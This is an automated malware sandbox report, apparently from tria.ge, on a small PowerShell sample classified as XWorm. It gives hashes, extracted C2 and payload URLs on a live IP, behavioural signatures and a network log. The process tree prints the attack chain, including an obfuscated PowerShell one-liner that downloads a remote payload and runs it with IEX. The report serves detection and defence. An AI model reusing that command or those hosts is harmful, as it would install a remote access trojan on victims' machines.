Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
97s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18/11/2024, 15:47 UTC
Static task
static1
Behavioral task
behavioral1
Sample
prueba.ps1
Resource
win7-20240903-en
General
-
Target
prueba.ps1
-
Size
124B
-
MD5
6542fcabb69f2e45e5abb6ef369d6b4b
-
SHA1
a9e758873a6c57d87b7e3bf02cfc04be6959d59b
-
SHA256
fd4dd13239fcd0e3171711951768b399b1b2210af3e6b4f7cc1c0a594bff7133
-
SHA512
6f9a75d4e17909c0dea87683bec1286964b8b21db927650c72db8b33df37b07a16b84bd56db42a5055e20c1895821b541467812dc03d5cefb4a144cebb2afb26
Malware Config
Extracted
http://185.147.124.40/Capcha.html
Extracted
http://185.147.124.40/x/8.png
Extracted
xworm
185.147.124.40:4404
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4088-31-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 4000 mshta.exe 14 2584 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2584 set thread context of 4088 2584 powershell.exe 91 -
pid Process 1260 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3860 ipconfig.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1260 powershell.exe 1260 powershell.exe 2584 powershell.exe 2584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1260 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 4088 RegSvcs.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1260 wrote to memory of 4000 1260 powershell.exe 84 PID 1260 wrote to memory of 4000 1260 powershell.exe 84 PID 4000 wrote to memory of 2584 4000 mshta.exe 87 PID 4000 wrote to memory of 2584 4000 mshta.exe 87 PID 2584 wrote to memory of 3860 2584 powershell.exe 90 PID 2584 wrote to memory of 3860 2584 powershell.exe 90 PID 2584 wrote to memory of 4088 2584 powershell.exe 91 PID 2584 wrote to memory of 4088 2584 powershell.exe 91 PID 2584 wrote to memory of 4088 2584 powershell.exe 91 PID 2584 wrote to memory of 4088 2584 powershell.exe 91 PID 2584 wrote to memory of 4088 2584 powershell.exe 91 PID 2584 wrote to memory of 4088 2584 powershell.exe 91 PID 2584 wrote to memory of 4088 2584 powershell.exe 91 PID 2584 wrote to memory of 4088 2584 powershell.exe 91
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\prueba.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://185.147.124.40/Capcha.html2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/8.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns4⤵
- Gathers network information
PID:3860
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
-
Network
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:185.147.124.40:80RequestGET /Capcha.html HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.147.124.40
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Last-Modified: Mon, 21 Oct 2024 15:04:18 GMT
Accept-Ranges: bytes
ETag: "054680ca23db1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Date: Mon, 18 Nov 2024 15:47:56 GMT
Content-Length: 7343
-
Remote address:8.8.8.8:53Request83.210.23.2.in-addr.arpaIN PTRResponse83.210.23.2.in-addr.arpaIN PTRa2-23-210-83deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request40.124.147.185.in-addr.arpaIN PTRResponse
-
Remote address:185.147.124.40:80RequestGET /x/8.png HTTP/1.1
Host: 185.147.124.40
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Last-Modified: Mon, 21 Oct 2024 14:52:15 GMT
Accept-Ranges: bytes
ETag: "0bcbcd1c823db1:0"
Server: Microsoft-IIS/10.0
Date: Mon, 18 Nov 2024 15:47:57 GMT
Content-Length: 183466
-
Remote address:8.8.8.8:53Request74.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request58.55.71.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request50.23.12.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.210.23.2.in-addr.arpaIN PTRResponse88.210.23.2.in-addr.arpaIN PTRa2-23-210-88deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
881 B 7.9kB 12 8
HTTP Request
GET http://185.147.124.40/Capcha.htmlHTTP Response
200 -
3.4kB 189.2kB 72 137
HTTP Request
GET http://185.147.124.40/x/8.pngHTTP Response
200 -
2.4kB 1.4kB 29 27
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
-
73 B 133 B 1 1
DNS Request
40.124.147.185.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
74.32.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
58.55.71.13.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
50.23.12.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
88.210.23.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82